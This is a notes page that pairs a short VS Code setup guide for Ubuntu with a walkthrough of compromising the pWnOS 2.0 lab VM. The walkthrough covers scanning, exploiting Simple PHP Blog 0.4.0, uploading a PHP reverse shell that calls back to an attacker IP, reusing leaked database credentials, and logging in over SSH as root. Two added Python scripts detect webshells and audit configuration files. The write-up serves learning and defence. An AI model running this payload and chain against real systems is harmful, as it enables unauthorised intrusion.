OS-Linux-Ubuntu-Tool-vscode


On Ubuntu, vscode can be used to debug code.
The vscode website is: https://code.visualstudio.com/
For Ubuntu, a deb package is provided.
Download the deb package, open a terminal in the same directory, and install it with: sudo dpkg -i code_1.77.1-1680651665_amd64.deb

In the Ubuntu desktop, page through Show Applications to find the installed vscode icon.
Add to Favorites -> right-click the vscode icon; it offers to add it to Favorites, which lets you launch VS Code quickly.

vscode Extensions

  1. C/C++ v1.14.5
  2. C/C++ Extension Pack
  3. C/C++ Themes
  4. Python v2023.6.0
  5. ...

Debugging C++ with vscode

https://code.visualstudio.com/docs

  1. sudo apt-get install g++ gcc cmake
  2. Check the installed versions: g++ -v, gcc -v, cmake -version
  3. Open vscode, create main.cpp, and write a demo program (main.cpp).
  4. Press F5 (Start Debugging).
  • Because this is the first debug run, you are asked to pick a debugger first; this generates the .vscode configuration folder and JSON configuration files such as tasks.json,
    and also produces the output binary, e.g. main.
  • You can also add the configuration files first and then debug.
    • Menu bar -> Run -> Add Configurations
    • Left sidebar -> RUN AND DEBUG

vscode .vscode configuration files

  1. launch.json: location of the executable to launch, etc.
  2. tasks.json: compile and link parameters, etc.
  3. c_cpp_properties.json: among other things, includePath lists third-party header directories
  4. ...

pWnOS 2.0

1. Host discovery

  1. Host discovery (ping sweep)

    ┌──(de1te㉿de1te)-[~]
    └─$ sudo nmap -sn 10.10.10.0/24  
    [sudo] de1te 的密码:
    Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-07 10:00 CST
    Nmap scan report for 10.10.10.1
    Host is up (0.00055s latency).
    MAC Address: 00:50:56:C0:00:08 (VMware)
    Nmap scan report for 10.10.10.15
    Host is up (0.000050s latency).
    MAC Address: 00:50:56:FD:40:27 (VMware)
    Nmap scan report for 10.10.10.100
    Host is up (0.00010s latency).
    MAC Address: 00:0C:29:5F:8B:AA (VMware)
    Nmap scan report for 10.10.10.254
    Host is up (0.00014s latency).
    MAC Address: 00:50:56:ED:BE:4A (VMware)
    Nmap scan report for 10.10.10.90
    Host is up.
    Nmap done: 256 IP addresses (5 hosts up) scanned in 1.82 seconds
    
    • Target address: 10.10.10.100

2. Port scanning

  1. Scan for open ports

    ┌──(de1te㉿de1te)-[~]
    └─$ sudo nmap --min-rate 10000  -p- 10.10.10.100
    Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-07 10:03 CST
    Nmap scan report for 10.10.10.100
    Host is up (0.00010s latency).
    Not shown: 65533 closed tcp ports (reset)
    PORT   STATE SERVICE
    22/tcp open  ssh
    80/tcp open  http
    MAC Address: 00:0C:29:5F:8B:AA (VMware)
    
    Nmap done: 1 IP address (1 host up) scanned in 1.88 seconds
    
    • Ports 22 and 80 are open
  2. Scan the open ports for services and versions

    ┌──(de1te㉿de1te)-[~]
    └─$ sudo nmap -sT -sV -O  -p22,80 10.10.10.100
    Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-07 10:04 CST
    Nmap scan report for 10.10.10.100
    Host is up (0.00049s latency).
    
    PORT   STATE SERVICE VERSION
    22/tcp open  ssh     OpenSSH 5.8p1 Debian 1ubuntu3 (Ubuntu Linux; protocol 2.0)
    80/tcp open  http    Apache httpd 2.2.17 ((Ubuntu))
    MAC Address: 00:0C:29:5F:8B:AA (VMware)
    Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
    Device type: general purpose
    Running: Linux 2.6.X
    OS CPE: cpe:/o:linux:linux_kernel:2.6
    OS details: Linux 2.6.32 - 2.6.39
    Network Distance: 1 hop
    Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
    
    OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 8.66 seconds
    
    • Normally, scan twice so that network problems don't distort the results.

    UDP scan

    ┌──(de1te㉿de1te)-[~]
    └─$ sudo nmap -sU  -p22,80 10.10.10.100 
    Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-07 10:06 CST
    Nmap scan report for 10.10.10.100
    Host is up (0.00024s latency).
    
    PORT   STATE  SERVICE
    22/udp closed ssh
    80/udp closed http
    MAC Address: 00:0C:29:5F:8B:AA (VMware)
    
    Nmap done: 1 IP address (1 host up) scanned in 0.19 seconds
                                                                 
    
  3. Common vulnerability scan

    ┌──(de1te㉿de1te)-[~]
    └─$ sudo nmap -script=vuln  -p22,80 10.10.10.100 
    Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-07 10:07 CST
    Pre-scan script results:
    | broadcast-avahi-dos: 
    |   Discovered hosts:
    |     224.0.0.251
    |   After NULL UDP avahi packet DoS (CVE-2011-1002).
    |_  Hosts are all up (not vulnerable).
    Nmap scan report for 10.10.10.100
    Host is up (0.00031s latency).
    
    PORT   STATE SERVICE
    22/tcp open  ssh
    80/tcp open  http
    | http-enum: 
    |   /blog/: Blog
    |   /login.php: Possible admin folder
    |   /login/: Login page
    |   /info.php: Possible information file
    |   /icons/: Potentially interesting folder w/ directory listing
    |   /includes/: Potentially interesting directory w/ listing on 'apache/2.2.17 (ubuntu)'
    |   /index/: Potentially interesting folder
    |   /info/: Potentially interesting folder
    |_  /register/: Potentially interesting folder
    |_http-dombased-xss: Couldn't find any DOM based XSS.
    |_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
    | http-csrf: 
    | Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=10.10.10.100
    |   Found the following possible CSRF vulnerabilities: 
    |     
    |     Path: http://10.10.10.100:80/register.php
    |     Form id: 
    |     Form action: register.php
    |     
    |     Path: http://10.10.10.100:80/login.php
    |     Form id: 
    |_    Form action: login.php
    |_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
    | http-cookie-flags: 
    |   /: 
    |     PHPSESSID: 
    |       httponly flag not set
    |   /login.php: 
    |     PHPSESSID: 
    |       httponly flag not set
    |   /login/: 
    |     PHPSESSID: 
    |       httponly flag not set
    |   /index/: 
    |     PHPSESSID: 
    |       httponly flag not set
    |   /register/: 
    |     PHPSESSID: 
    |_      httponly flag not set
    MAC Address: 00:0C:29:5F:8B:AA (VMware)
    
    Nmap done: 1 IP address (1 host up) scanned in 55.66 seconds
    

Summary: ports 22 and 80 are open, so we can start from port 80. The server's kernel version is old.

3. Web penetration

  1. Directory brute-forcing

    ┌──(de1te㉿de1te)-[~]
    └─$ sudo gobuster dir -u http://10.10.10.100 -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt 
    ===============================================================
    Gobuster v3.5
    by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
    ===============================================================
    [+] Url:                     http://10.10.10.100
    [+] Method:                  GET
    [+] Threads:                 10
    [+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt
    [+] Negative Status codes:   404
    [+] User Agent:              gobuster/3.5
    [+] Timeout:                 10s
    ===============================================================
    2023/04/07 10:24:38 Starting gobuster in directory enumeration mode
    ===============================================================
    /includes             (Status: 301) [Size: 315] [--> http://10.10.10.100/includes/]
    /register             (Status: 200) [Size: 1562]
    /login                (Status: 200) [Size: 1174]
    /blog                 (Status: 301) [Size: 311] [--> http://10.10.10.100/blog/]
    /info                 (Status: 200) [Size: 49871]
    /index                (Status: 200) [Size: 854]
    /activate             (Status: 302) [Size: 0] [--> http://10.10.10.100/index.php]
    /server-status        (Status: 403) [Size: 293]
    Progress: 21892 / 62285 (35.15%)[ERROR] 2023/04/07 10:24:42 [!] parse "http://10.10.10.100/error\x1f_log": net/url: invalid control character in URL
    /index                (Status: 200) [Size: 854]
    Progress: 61574 / 62285 (98.86%)
    ===============================================================
    2023/04/07 10:24:48 Finished
    ===============================================================
    
  2. Browsing the site

    Port 80

    There is a login page, but manual injection attempts did not work.

    http://10.10.10.100/includes/

    There is a config file, but when we download it, it is empty.

    http://10.10.10.100/blog/index.php

    • The page says it is Simple PHP Blog 0.4.0
    • A quick search shows it is a simple blog system. Let's see whether it has any known vulnerabilities.
    ┌──(de1te㉿de1te)-[~]
    └─$ searchsploit simple php blog
    ----------------------------------------------------------------------------------- ---------------------------------
     Exploit Title                                                                     |  Path
    ----------------------------------------------------------------------------------- ---------------------------------
    Insanely Simple Blog 0.4/0.5 - 'index.php' SQL Injection                           | php/webapps/30317.txt
    Insanely Simple Blog 0.4/0.5 - Cross-Site Scripting                                | php/webapps/30318.txt
    Insanely Simple Blog 0.5 - SQL Injection                                           | php/webapps/5774.txt
    Simple Blog PHP 2.0 - Multiple Vulnerabilities                                     | php/webapps/40518.txt
    Simple Blog PHP 2.0 - SQL Injection                                                | php/webapps/40519.txt
    Simple PHP Blog (SPHPBlog) 0.5.1 - Code Execution                                  | php/webapps/6311.php
    Simple PHP Blog (sPHPblog) 0.5.1 - Multiple Vulnerabilities                        | php/webapps/4557.txt
    Simple PHP Blog 0.4 - 'colors.php' Multiple Cross-Site Scripting Vulnerabilities   | cgi/webapps/26463.txt
    Simple PHP Blog 0.4 - 'preview_cgi.php' Multiple Cross-Site Scripting Vulnerabilit | cgi/webapps/26461.txt
    Simple PHP Blog 0.4 - 'preview_static_cgi.php' Multiple Cross-Site Scripting Vulne | cgi/webapps/26462.txt
    Simple PHP Blog 0.4.0 - Multiple Remote s                                          | php/webapps/1191.pl
    Simple PHP Blog 0.4.0 - Remote Command Execution (Metasploit)                      | php/webapps/16883.rb
    Simple PHP Blog 0.4.7.1 - Remote Command Execution                                 | php/webapps/1581.pl
    Simple PHP Blog 0.5.1 - Local File Inclusion                                       | php/webapps/10604.pl
    Simple PHP Blog 0.5.x - 'search.php' Cross-Site Scripting                          | php/webapps/33507.txt
    Simple PHP Blog 0.8.4 - Cross-Site Request Forgery (Add Admin)                     | php/webapps/40475.txt
    SimpleBlog 2.0 - 'comments.asp' SQL Injection (2)                                  | php/webapps/2232.pl
    SimpleBlog 3.0 - Database Disclosure                                               | php/webapps/7232.txt
    Super Simple Blog Script 2.5.4 - 'entry' SQL Injection                             | php/webapps/9180.txt
    Super Simple Blog Script 2.5.4 - Local File Inclusion                              | php/webapps/9179.txt
    ----------------------------------------------------------------------------------- ---------------------------------
    
    • Vulnerabilities do exist
    searchsploit -m 1191

    • This mirrors (downloads) the file 1191.pl

    Usage

    • There seem to be plenty of things to exploit here
    1. Method one:

      perl 1191.pl -h http://10.10.10.100/blog -e 1  
      

      The uploaded cmd file is just a simple one-line webshell.

    2. Method two

      perl 1191.pl -h http://10.10.10.100/blog/ -e 3 -U 123 -P 123   
      

      This logs into the admin back end successfully.

      There is a photo upload feature; let's see whether other file types can be uploaded.

      <?php exec("/bin/bash -c 'bash -i >& /dev/tcp/10.10.10.90/443 0>&1'") ?>
      

      The upload succeeded.

    Summary: both methods work; either way, the final step is getting the file uploaded into the images folder.
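From the defender's side, the chain above (a PHP file landing in /blog/images/ and then being requested over HTTP) leaves a clear trace in the Apache access log. The following Python script is an added example, not from the original walkthrough: it parses combined-format log lines and flags any script-extension request under an upload-only directory; the sample log lines and the /blog/images/ upload path are constructed assumptions.

```python
import re

# Apache "combined" format: ip ident user [ts] "METHOD path proto" status size "ref" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

# Assumption: the blog stores uploaded images here (the walkthrough's shell
# ends up in /var/www/blog/images, which Apache serves as /blog/images/).
UPLOAD_DIRS = ("/blog/images/",)
# Extensions a PHP-enabled Apache would execute instead of serving as bytes.
SCRIPT_EXTS = (".php", ".phtml", ".php3", ".php5", ".phar")


def parse_line(line):
    """Return the log fields as a dict, or None if the line is not combined format."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def is_script_under_upload_dir(path):
    """True if the request path names a script file inside an upload-only directory."""
    p = path.split("?", 1)[0].lower()          # drop the query string, normalise case
    return p.startswith(UPLOAD_DIRS) and p.endswith(SCRIPT_EXTS)


def find_webshell_hits(lines):
    """Return (ip, method, path, status) for each request of a script in an upload dir."""
    hits = []
    for line in lines:
        rec = parse_line(line)
        if rec and is_script_under_upload_dir(rec["path"]):
            hits.append((rec["ip"], rec["method"], rec["path"], rec["status"]))
    return hits


# Constructed sample log (not from the walkthrough): a page view, an upload POST,
# a benign image fetch, and finally the dropped script being executed.
SAMPLE_LOG = [
    '10.10.10.90 - - [07/Apr/2023:10:40:01 +0800] "GET /blog/index.php HTTP/1.1" 200 4123 "-" "Mozilla/5.0"',
    '10.10.10.90 - - [07/Apr/2023:10:41:15 +0800] "POST /blog/index.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
    '10.10.10.90 - - [07/Apr/2023:10:41:20 +0800] "GET /blog/images/logo.png HTTP/1.1" 200 8812 "-" "Mozilla/5.0"',
    '10.10.10.90 - - [07/Apr/2023:10:41:33 +0800] "GET /blog/images/cmd.php?x=1 HTTP/1.1" 200 57 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for hit in find_webshell_hits(SAMPLE_LOG):
        print("script executed from upload dir:", hit)
```

On the server itself the upload directory should also have script execution disabled, e.g. `php_admin_flag engine off` inside a `<Directory /var/www/blog/images>` block for mod_php, so a dropped file is served as bytes rather than run.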

4. Privilege escalation

We have just uploaded our reverse shell through the Simple PHP Blog vulnerability.

sudo nc -lvnp 443 # start a listener on port 443
www-data@web:/var/www/blog/images$ whoami
whoami
www-data
www-data@web:/var/www/blog/images$ sudo -l
sudo -l
sudo: no tty present and no askpass program specified

No tty; check whether python is installed.

dpkg -l

python -c "import pty;pty.spawn('/bin/bash')"
www-data@web:/var/www/blog/images$ sudo -l
sudo -l
[sudo] password for www-data: 
Sorry, try again.
[sudo] password for www-data: 
da
Sorry, try again.
[sudo] password for www-data: 
da
Sorry, try again.
sudo: 3 incorrect password attempts
  • We don't know the password

Everything is ready so far, so let's start escalating privileges. Hmm, let's first check for leaked sensitive files.

www-data@web:/var/www/blog$ cd ..
cd ..
www-data@web:/var/www$ ls
ls
activate.php  includes   info.php   mysqli_connect.php
blog          index.php  login.php  register.php
www-data@web:/var/www$ cat mysqli_connect.php
cat mysqli_connect.php
<?php # Script 8.2 - mysqli_connect.php

// This file contains the database access information.
// This file also establishes a connection to MySQL
// and selects the database.

// Set the database access information as constants:

DEFINE ('DB_USER', 'root');
DEFINE ('DB_PASSWORD', 'goodday');
DEFINE ('DB_HOST', 'localhost');
DEFINE ('DB_NAME', 'ch16');

// Make the connection:

$dbc = @mysqli_connect (DB_HOST, DB_USER, DB_PASSWORD, DB_NAME) OR die ('Could not connect to MySQL: ' . mysqli_connect_error() );
  • username: root, password: goodday

Let's try it.

www-data@web:/var/www$ mysql -u root -p 
mysql -u root -p 
Enter password: goodday

ERROR 1045 (28000): Access denied for user 'root'@'localhost' (using password: YES)

Wrong password?!!!

But the web service is still running, which means the real configuration file must exist somewhere.

www-data@web:/var/www$ cd ..
cd ..
www-data@web:/var$ ls
ls
backups  crash       lib    lock  mail                opt  spool  uploads
cache    index.html  local  log   mysqli_connect.php  run  tmp    www
www-data@web:/var$ cat mysqli_connect.php
cat mysqli_connect.php
<?php # Script 8.2 - mysqli_connect.php

// This file contains the database access information.
// This file also establishes a connection to MySQL
// and selects the database.

// Set the database access information as constants:

DEFINE ('DB_USER', 'root');
DEFINE ('DB_PASSWORD', 'root@ISIntS');
DEFINE ('DB_HOST', 'localhost');
DEFINE ('DB_NAME', 'ch16');

// Make the connection:

$dbc = @mysqli_connect (DB_HOST, DB_USER, DB_PASSWORD, DB_NAME) OR die ('Could not connect to MySQL: ' . mysqli_connect_error() );
  • Sure enough!!!

Connect over ssh
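The stray copy of mysqli_connect.php outside the document root, readable by www-data and holding the database root password (which also turns out to be the system root password), is exactly what a periodic file audit should catch. The Python script below is an added example, not part of the walkthrough: it walks a directory tree for the DEFINE('DB_*', ...) pattern this config uses and reports world-readable files and root DB accounts; it builds a constructed copy of the layout with placeholder passwords in a temp directory so it runs offline.

```python
import os
import re
import stat
import tempfile
# Matches the DEFINE('DB_xxx', 'value') lines used by mysqli_connect.php.
DEFINE_RE = re.compile(
    r"""DEFINE\s*\(\s*['"](?P<name>DB_[A-Za-z_]+)['"]\s*,\s*['"](?P<value>[^'"]*)['"]\s*\)""",
    re.IGNORECASE,
)

def extract_db_constants(text):
    """Return {CONSTANT: value} for every DEFINE('DB_*', ...) found in text."""
    return {m.group("name").upper(): m.group("value") for m in DEFINE_RE.finditer(text)}

def audit_file(path):
    """Return a finding for a file that embeds a DB password, else None."""
    with open(path, encoding="utf-8", errors="replace") as fh:
        consts = extract_db_constants(fh.read())
    if "DB_PASSWORD" not in consts:
        return None
    mode = os.stat(path).st_mode
    return {
        "path": path,
        "world_readable": bool(mode & stat.S_IROTH),   # any local user can read it
        "privileged_db_user": consts.get("DB_USER") == "root",
    }

def audit_tree(root):
    """Walk root and collect findings for every .php file holding DB credentials."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name.endswith(".php"):
                finding = audit_file(os.path.join(dirpath, name))
                if finding:
                    findings.append(finding)
    return sorted(findings, key=lambda f: f["path"])

def build_sample_tree():
    """Construct the walkthrough's layout in a temp dir (placeholder passwords)."""
    root = tempfile.mkdtemp()
    os.makedirs(os.path.join(root, "var", "www"))
    body = "<?php\nDEFINE ('DB_USER', 'root');\nDEFINE ('DB_PASSWORD', '%s');\n"
    for rel, pw in (("var/www/mysqli_connect.php", "PLACEHOLDER_DECOY"),
                    ("var/mysqli_connect.php", "PLACEHOLDER_REAL")):
        target = os.path.join(root, rel)
        with open(target, "w") as fh:
            fh.write(body % pw)
        os.chmod(target, 0o644)                          # world-readable, as on the VM
    return root
```

Run `audit_tree("/var")` on a real host to list every config copy, then tighten the mode to 0640 with the web server group as owner and replace the root DB account with a least-privilege one.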

┌──(de1te㉿de1te)-[~]
└─$ sudo ssh root@10.10.10.100
root@10.10.10.100's password: 
Welcome to Ubuntu 11.04 (GNU/Linux 2.6.38-8-server x86_64)

 * Documentation:  http://www.ubuntu.com/server/doc

  System information as of Fri Apr  7 02:15:10 EDT 2023

  System load:  0.0               Processes:           82
  Usage of /:   2.9% of 38.64GB   Users logged in:     0
  Memory usage: 26%               IP address for eth0: 10.10.10.100
  Swap usage:   0%

  Graph this data and manage this system at https://landscape.canonical.com/
Last login: Mon May  9 19:29:03 2011
root@web:~#

Final proof:

root@web:~# whoami
root
root@web:~# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 16436 qdisc noqueue state UNKNOWN 
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP qlen 1000
    link/ether 00:0c:29:5f:8b:aa brd ff:ff:ff:ff:ff:ff
    inet 10.10.10.100/24 brd 10.10.10.255 scope global eth0
    inet6 fe80::20c:29ff:fe5f:8baa/64 scope link 
       valid_lft forever preferred_lft forever
root@web:~# id 
uid=0(root) gid=0(root) groups=0(root)
root@web:~# sudo -l 
Matching Defaults entries for root on this host:
    env_reset

User root may run the following commands on this host:
    (ALL : ALL) ALL
